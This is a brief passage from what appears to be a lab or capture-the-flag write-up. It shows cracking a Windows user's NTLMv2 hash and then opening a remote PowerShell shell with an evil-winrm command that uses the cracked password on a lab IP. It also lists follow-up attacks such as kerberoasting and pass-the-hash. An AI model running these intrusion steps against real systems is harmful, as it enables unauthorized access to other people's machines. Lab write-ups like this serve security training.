Exploitation
Cracked the NTLMV2 Hash for enox. I am going to first try: kerberoasting, aesproasting, pth on all services i can, rdp, see smb shares, winrm, rpc client, maybe ldapsearch now will work.
Evil winrm was the way in.
evil-winrm -i 192.168.105.165 -u 'enox' -p 'california'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents>
Last updated